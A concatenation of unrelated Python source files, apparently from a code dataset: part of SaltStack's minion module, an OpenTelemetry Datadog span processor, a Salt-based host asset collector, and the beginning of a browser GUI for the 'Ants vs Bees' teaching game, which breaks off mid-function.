jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
jdict['master_id'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~60s attempting to re-auth
with the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
def __init__(self, opts):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# create all of the syndics you need
self.master_syndics = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self.master_syndics[master] = {'opts': s_opts,
'auth_wait': s_opts['acceptance_wait_time'],
'dead_until': 0}
self._connect_to_master(master)
# TODO: do we need all of this?
def _connect_to_master(self, master):
'''
Attempt to connect to master, including back-off for each one
return boolean of whether you connected or not
'''
if master not in self.master_syndics:
log.error('Unable to connect to {0}, not in the list of masters'.format(master))
return False
minion = self.master_syndics[master]
# if we need to be dead for a while, stay that way
if minion['dead_until'] > time.time():
return False
if time.time() - minion['auth_wait'] > minion.get('last', 0):
try:
t_minion = Syndic(minion['opts'],
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
)
self.master_syndics[master]['syndic'] = t_minion
self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
self.master_syndics[master]['dead_until'] = 0
return True
except SaltClientError:
log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
# re-use auth-wait as backoff for syndic
minion['dead_until'] = time.time() + minion['auth_wait']
if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
minion['auth_wait'] += self.opts['acceptance_wait_time']
return False
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_dict in self.iter_master_options(master_id):
if 'syndic' not in syndic_dict:
continue
if syndic_dict['dead_until'] > time.time():
log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master_id))
continue
try:
getattr(syndic_dict['syndic'], func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
# re-use auth-wait as backoff for syndic
syndic_dict['dead_until'] = time.time() + syndic_dict['auth_wait']
if syndic_dict['auth_wait'] < self.opts['acceptance_wait_time_max']:
syndic_dict['auth_wait'] += self.opts['acceptance_wait_time']
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self.master_syndics.keys())
shuffle(masters)
if master_id not in self.master_syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self.master_syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# Share the poller with the event object
self.poller = self.local.event.poller
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
# check all of your master_syndics, have them do their thing
for master_id, syndic_dict in self.master_syndics.items():
# if not connected, lets try
if 'generator' not in syndic_dict:
# if we couldn't connect, lets try later
if not self._connect_to_master(master_id):
continue
next(syndic_dict['generator'])
# events
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic')},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'), master_id=jid_ret.get('__master_id__'))
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, str):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
self.functions = salt.loader.minion_mods(self.opts)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
spanprocessor.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import typing
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.instrumentation.utils import _SUPPRESS_INSTRUMENTATION_KEY
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.sdk.trace.export import SpanExporter
from opentelemetry.trace import INVALID_TRACE_ID
from opentelemetry.util._time import _time_ns
logger = logging.getLogger(__name__)
class DatadogExportSpanProcessor(SpanProcessor):
"""Datadog exporter span processor
DatadogExportSpanProcessor is an implementation of `SpanProcessor` that
batches all opened spans into a list per trace. When all spans for a trace
are ended, the trace is queues up for export. This is required for exporting
to the Datadog Agent which expects to received list of spans for each trace.
"""
_FLUSH_TOKEN = INVALID_TRACE_ID
def __init__(
self,
span_exporter: SpanExporter,
schedule_delay_millis: float = 5000,
max_trace_size: int = 4096,
):
if max_trace_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
self.span_exporter = span_exporter
# queue trace_ids for traces with recently ended spans for worker thread to check
# for exporting
self.check_traces_queue = (
collections.deque()
) # type: typing.Deque[int]
self.traces_lock = threading.Lock()
# dictionary of trace_ids to a list of spans where the first span is the
# first opened span for the trace
self.traces = collections.defaultdict(list)
# counter to keep track of the number of spans and ended spans for a
# trace_id
self.traces_spans_count = collections.Counter()
self.traces_spans_ended_count = collections.Counter()
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
# threading conditions used for flushing and shutdown
self.condition = threading.Condition(threading.Lock())
self.flush_condition = threading.Condition(threading.Lock())
# flag to indicate that there is a flush operation on progress
self._flushing = False
self.max_trace_size = max_trace_size
self._spans_dropped = False
self.schedule_delay_millis = schedule_delay_millis
self.done = False
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
# check upper bound on number of spans for trace before adding new
# span
if self.traces_spans_count[trace_id] == self.max_trace_size:
logger.warning("Max spans for trace, spans will be dropped.")
self._spans_dropped = True
return
# add span to end of list for a trace and update the counter
self.traces[trace_id].append(span)
self.traces_spans_count[trace_id] += 1
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
ctx = span.get_span_context()
trace_id = ctx.trace_id
with self.traces_lock:
self.traces_spans_ended_count[trace_id] += 1
if self.is_trace_exportable(trace_id):
self.check_traces_queue.appendleft(trace_id)
def worker(self):
timeout = self.schedule_delay_millis / 1e3
while not self.done:
if not self._flushing:
with self.condition:
self.condition.wait(timeout)
if not self.check_traces_queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
continue
if self.done:
# missing spans will be sent when calling flush
break
# substract the duration of this export call to the next timeout
start = _time_ns()
self.export()
end = _time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
# be sure that all spans are sent
self._drain_queue()
def is_trace_exportable(self, trace_id):
return (
self.traces_spans_count[trace_id]
- self.traces_spans_ended_count[trace_id]
<= 0
)
def export(self) -> None:
"""Exports traces with finished spans."""
notify_flush = False
export_trace_ids = []
while self.check_traces_queue:
trace_id = self.check_traces_queue.pop()
if trace_id is self._FLUSH_TOKEN:
notify_flush = True
else:
with self.traces_lock:
# check whether trace is exportable again in case that new
# spans were started since we last concluded trace was
# exportable
if self.is_trace_exportable(trace_id):
export_trace_ids.append(trace_id)
del self.traces_spans_count[trace_id]
del self.traces_spans_ended_count[trace_id]
if len(export_trace_ids) > 0:
token = attach(set_value(_SUPPRESS_INSTRUMENTATION_KEY, True))
for trace_id in export_trace_ids:
with self.traces_lock:
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.traces[trace_id]) # type: ignore
# pylint: disable=broad-except
except Exception:
logger.exception(
"Exception while exporting Span batch."
)
finally:
del self.traces[trace_id]
detach(token)
if notify_flush:
with self.flush_condition:
self.flush_condition.notify()
def _drain_queue(self):
"""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.check_traces_queue:
self.export()
def force_flush(self, timeout_millis: int = 30000) -> bool:
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
self._flushing = True
self.check_traces_queue.appendleft(self._FLUSH_TOKEN)
# wake up worker thread
with self.condition:
self.condition.notify_all()
# wait for token to be processed
with self.flush_condition:
ret = self.flush_condition.wait(timeout_millis / 1e3)
self._flushing = False
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
|
asset_info.py
|
#!/usr/bin/env python
# coding: utf8
'''
@Creator: valor7
@Email: valor7@163.com
@File: asset_info.py
@Time: 2017/10/15 15:33
@desc:
'''
from deploy.saltapi import SaltAPI
from oms_valor7 import settings
import threading
asset_info = []
def GetInfoDict(r, arg):
try:
result = ''
for k in r[arg]:
result = result + k + ': ' + str(r[arg][k]) + '\n'
except:
result = 'Nan'
return result
def GetInfo(r, arg):
try:
arg = str(r[arg])
except:
arg = 'Nan'
return arg
def GetAssetInfo(tgt):
'''
Salt API获取主机信息并进行格式化输出
'''
global asset_info
info = {}
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
ret = sapi.remote_server_info(tgt, 'grains.items')
info['sn']=GetInfo(ret,'serialnumber')
info['hostname']=GetInfo(ret,'fqdn')
info['nodename']=tgt
info['os']=GetInfo(ret,'os')+GetInfo(ret,'osrelease')+' '+GetInfo(ret,'osarch')
info['manufacturer']=GetInfo(ret,'manufacturer')
info['cpu_model']=GetInfo(ret,'cpu_model')
info['productname']=GetInfo(ret,'productname')
info['cpu_nums']=GetInfo(ret,'num_cpus')
info['kernel'] = GetInfo(ret,'kernel') + GetInfo(ret,'kernelrelease')
info['zmqversion'] = GetInfo(ret,'zmqversion')
info['shell'] = GetInfo(ret,'shell')
info['saltversion'] = GetInfo(ret,'saltversion')
info['locale'] = GetInfoDict(ret, 'locale_info')
info['selinux'] = GetInfoDict(ret, 'selinux')
if 'virtual_subtype' in ret:
virtual = GetInfo(ret,'virtual') + '-' + GetInfo(ret,'virtual_subtype')
else:
virtual=GetInfo(ret,'virtual')
info['virtual'] = virtual
try:
hwaddr = ret['hwaddr_interfaces']
ipaddr = ret['ip4_interfaces']
hwaddr.pop('lo')
ipaddr.pop('lo')
network = ''
for i in ipaddr:
ip = ''
for j in ipaddr[i]:
ip = ip + j + '/'
network = network + i + ': ' + ip.strip('/') + '-' + hwaddr[i] + '\n'
info['network'] = network
except:
info['network'] = 'Nan'
mem=GetInfo(ret,'mem_total')
if mem > 1000:
mem = int(mem)/1000.0
memory = ('%.1f'%mem) + 'G'
else:
memory = str(mem) + 'M'
info['memory'] = memory
ret = sapi.remote_server_info(tgt, 'disk.usage')
disk = ''
for i in ret:
r = int(ret[i]['1K-blocks'])/1000
if r > 1000:
r = r/1000
s = str(r) + 'G'
if r > 1000:
r = r/1000.0
s = ('%.1f'%r) + 'T'
else:
s = str(r) + 'M'
disk = disk + i + ': ' + s + '\n'
info['disk'] = disk
asset_info.append(info)
def MultipleCollect(tgt_list):
global asset_info
asset_info = []
threads = []
loop = 0
count = len(tgt_list)
for i in range(0, count, 2):
keys = range(loop*2, (loop+1)*2, 1)
#实例化线程
for i in keys:
if i >= count:
break
else:
t = threading.Thread(target=GetAssetInfo, args=(tgt_list[i],))
threads.append(t)
#启动线程
for i in keys:
if i >=count:
break
else:
threads[i].start()
#等待并发线程结束
for i in keys:
if i >= count:
break
else:
threads[i].join()
loop = loop + 1
return asset_info
|
gui.py
|
import ants
import ants_strategies
import utils
import state
import json
import distutils.core
import urllib.request
import os
import shutil
import zipfile
import threading
import importlib
from time import sleep
from ucb import *
VERSION = 1.2
ASSETS_DIR = "assets/"
INSECT_DIR = "insects/"
STRATEGY_SECONDS = 3
INSECT_FILES = {
'Worker': ASSETS_DIR + INSECT_DIR + "ant_harvester.gif",
'Thrower': ASSETS_DIR + INSECT_DIR + "ant_thrower.gif",
'Long': ASSETS_DIR + INSECT_DIR + "ant_longthrower.gif",
'Short': ASSETS_DIR + INSECT_DIR + "ant_shortthrower.gif",
'Harvester': ASSETS_DIR + INSECT_DIR + "ant_harvester.gif",
'Fire': ASSETS_DIR + INSECT_DIR + "ant_fire.gif",
'Bodyguard': ASSETS_DIR + INSECT_DIR + "ant_bodyguard.gif",
'Hungry': ASSETS_DIR + INSECT_DIR + "ant_hungry.gif",
'Slow': ASSETS_DIR + INSECT_DIR + "ant_slow.gif",
'Scary': ASSETS_DIR + INSECT_DIR + "ant_scary.gif",
'Laser': ASSETS_DIR + INSECT_DIR + "ant_laser.gif",
'Ninja': ASSETS_DIR + INSECT_DIR + "ant_ninja.gif",
'Wall': ASSETS_DIR + INSECT_DIR + "ant_wall.gif",
'Scuba': ASSETS_DIR + INSECT_DIR + "ant_scuba.gif",
'Queen': ASSETS_DIR + INSECT_DIR + "ant_queen.gif",
'Tank': ASSETS_DIR + INSECT_DIR + "ant_tank.gif",
'Bee': ASSETS_DIR + INSECT_DIR + "bee.gif",
'Remover': ASSETS_DIR + INSECT_DIR + "remove.png",
}
class GUI:
"""Browser based GUI that communicates with Python game engine"""
def __init__(self):
self.active = True
self.cleanState()
def cleanState(self):
self.initialized = False
self.state = state.State()
self.gameOver = False
self.gamestate = None
self.currentBeeId = 0
self.currentInsectId = 0
self.insects = []
self.bees = []
self.deadbees = []
self.deadinsects = []
self.insectToId = {}
self.beeToId = {}
self.beeLocations = {}
def makeHooks(self):
ants.Insect.death_callback = dead_insect
def newGameThread(self):
print("Trying to start new game")
self.cleanState() # resets GUI state
importlib.reload(ants) # resets ants, e.g. with newly implemented Ants
self.makeHooks()
self.winner = ants_strategies.start_with_strategy(gui.args, gui.strategy, ants)
self.gameOver = True
self.saveState("winner", self.winner)
self.saveState("gameOver", self.gameOver)
# self.killGUI()
update()
def killGUI(self):
self.active = False
def startGame(self, data=None):
threading.Thread(target=self.newGameThread).start()
print("Game started")
def exit(self, data=None):
self.active = False
def initialize_colony_graphics(self, gamestate):
self.gamestate = gamestate
self.ant_type_selected = -1
self.saveState("strategyTime", STRATEGY_SECONDS)
self.saveState("food", self.gamestate.food)
self.ant_types = self.get_ant_types()
self._init_places(gamestate)
self.saveState("places", self.places)
# Finally log that we are initialized
self.initialized = True
def get_ant_types(self, noSave=False):
ant_types = [];
for name, ant_type in self.gamestate.ant_types.items():
ant_types.append({"name": name, "cost": ant_type.food_cost, "img": self.get_insect_img_file(name)})
# Sort by cost
ant_types.sort(key=lambda item: item["cost"])
if not noSave:
self.saveState("ant_types", ant_types)
return ant_types
def get_insect_img_file(self, name):
return INSECT_FILES[name]
def getState(self, data=None):
"""Get our message from JSON"""
return self.state.getState()
def saveState(self, key, val):
"""Saves our game object to JSON file"""
self.state.updateState(key, val)
def strategy(self, gamestate):
"""The strategy function is called by ants.GameState each turn"""
# Have we initialized our graphics yet?
if not self.initialized:
# No, so do that now
self.initialize_colony_graphics(gamestate)
elapsed = 0 # Physical time elapsed this turn
self.saveState("time", int(elapsed))
while elapsed < STRATEGY_SECONDS:
self.saveState("time", gamestate.time)
self._update_control_panel(gamestate)
sleep(0.25)
elapsed += 0.25
def get_place_row(self, name):
return name.split("_")[1]
def get_place_column(self, name):
return name.split("_")[2]
def _init_places(self, gamestate):
"""Calculate all of our place data"""
self.places = {};
self.images = {'AntQueen': dict()}
rows = 0
cols = 0
for name, place in gamestate.places.items():
if place.name == 'Hive':
continue
pCol = self.get_place_column(name)
pRow = self.get_place_row(name)
if place.exit.name == 'AntQueen':
rows += 1
if not pRow in self.places:
self.places[pRow] = {}
self.places[pRow][pCol] = {"name": name, "type": "tunnel", "water": 0, "insects": {}}
if "water" in name:
self.places[pRow][pCol]["water"] = 1
self.images[name] = dict()
# Add the Hive
self.places[gamestate.beehive.name] = {"name": name, "type": "beehive", "water": 0, "insects": {}}
self.places[gamestate.beehive.name]["insects"] = []
for bee in gamestate.beehive.bees:
self.places[gamestate.beehive.name]["insects"].append({"id": self.currentBeeId, "type": "bee"})
self.beeToId[bee] = self.currentBeeId
self.currentBeeId += 1
self.saveState("rows", len(self.places))
self.saveState("places", self.places);
def update_food(self):
self.saveState("food", self.gamestate.food)
def _update_control_panel(self, gamestate):
"""Reflect the game state in the play area."""
self.update_food()
old_insects = self.insects[:]
old_bees = self.bees[:]
self.bees, self.insects = [], []
for name, place in gamestate.places.items():
if place.name == 'Hive':
continue
pCol = self.get_place_column(name)
pRow = self.get_place_row(name)
if place.ant is not None:
if self.insectToId[place.ant] not in self.insects:
# Add this ant to our internal list of insects
self.insects.append(self.insectToId[place.ant])
# Ok there is an ant that needs to be drawn here
self.places[pRow][pCol]["insects"] = {
"id": self.insectToId[place.ant],
"type": place.ant.name,
"img": self.get_insect_img_file(place.ant.name)
}
# Check if it's a container ant
if place.ant is not None:
ant_container = isinstance(place.ant, ants.ContainerAnt)
self.places[pRow][pCol]["insects"]["container"] = ant_container
if ant_container and place.ant.ant_contained:
self.places[pRow][pCol]["insects"]["contains"] = {
"type": place.ant.ant_contained.name,
"img": self.get_insect_img_file(place.ant.ant_contained.name)
}
else:
self.places[pRow][pCol]["insects"] = {}
# Loop through our bees
for bee in place.bees:
self.beeLocations[self.beeToId[bee]] = name
if self.beeToId[bee] not in self.bees:
self.bees.append(self.beeToId[bee])
# Save our new bee locations to our game state
self.saveState("beeLocations", self.beeLocations)
def deployAnt(self, data):
# Check to see if the ant is a remover. If so we need to remove the ant in pname
pname, ant = data["pname"], data["ant"]
if ant == "Remover":
existing_ant = self.gamestate.places[pname].ant
if existing_ant is not None:
print("gamestate.remove_ant('{0}')".format(pname))
self.gamestate.remove_ant(pname)
return
insect = None
try:
print("gamestate.deploy_ant('{0}', '{1}')".format(pname, ant))
insect = self.gamestate.deploy_ant(pname, ant);
except Exception as e:
print(e)
return {"error": str(e)}
if not insect:
return {"error": "Unable to deploy ant"}
id = self.currentInsectId
self.insects.append(id)
self.insectToId[insect] = id
self.currentInsectId += 1
self._update_control_panel(self.gamestate);
return {"success": 1, "id": id}
import http.server
import cgi
class HttpHandler(http.server.SimpleHTTPRequestHandler):
# Override the default do_POST method
def log_message(self, format, *args):
# I hate this console output so simply do nothing.
return
def cgiFieldStorageToDict(self, fieldStorage):
""" Get a plain dictionary rather than the '.value' system used by the
cgi module's native fieldStorage class. """
params = {}
for key in fieldStorage.keys():
params[key] = fieldStorage[key].value
return params
def do_POST(self):
path = self.path
action = {
'/ajax/fetch/state': gui.getState,
'/ajax/start/game': gui.startGame,
'/ajax/exit': gui.exit,
'/ajax/deploy/ant': gui.deployAnt,
}.get(path)
if not action:
# We could not find a valid route
return
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
data = self.cgiFieldStorageToDict(form)
response = action(data)
self.send_response(200)
if response:
self.send_header('Content-Type', 'application/json')
self.end_headers()
response = json.dumps(response)
self.wfile.write(response.encode('ascii'))
def dead_insect(ant):
print('{0} ran out of health and expired'.format(ant))
if ant in gui.insectToId:
gui.deadinsects.append(gui.insectToId[ant])
gui.saveState("deadinsects", gui.deadinsects)
elif ant in gui.beeToId:
